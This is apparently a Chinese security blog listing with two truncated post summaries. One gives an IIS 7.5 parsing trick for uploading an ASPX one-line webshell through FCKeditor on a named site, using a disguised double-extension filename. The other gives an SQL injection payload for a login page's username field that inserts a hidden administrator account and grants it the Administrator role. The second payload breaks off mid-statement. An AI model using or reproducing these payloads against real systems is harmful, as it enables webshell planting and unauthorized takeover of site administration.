摘要:
IIS7.5解析漏洞http://www.cnk0n9.com/fckeditor/editor/fckeditor.html,上传图片,浏览,上传一个aspx的一句话木马,名字为:a.aspx.a;.a.aspx.jpg..jpg上传后直接得到上传地址 阅读全文
摘要:
EXP: 直接访问UserCenter/login.aspx用户名处输入: 123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into 阅读全文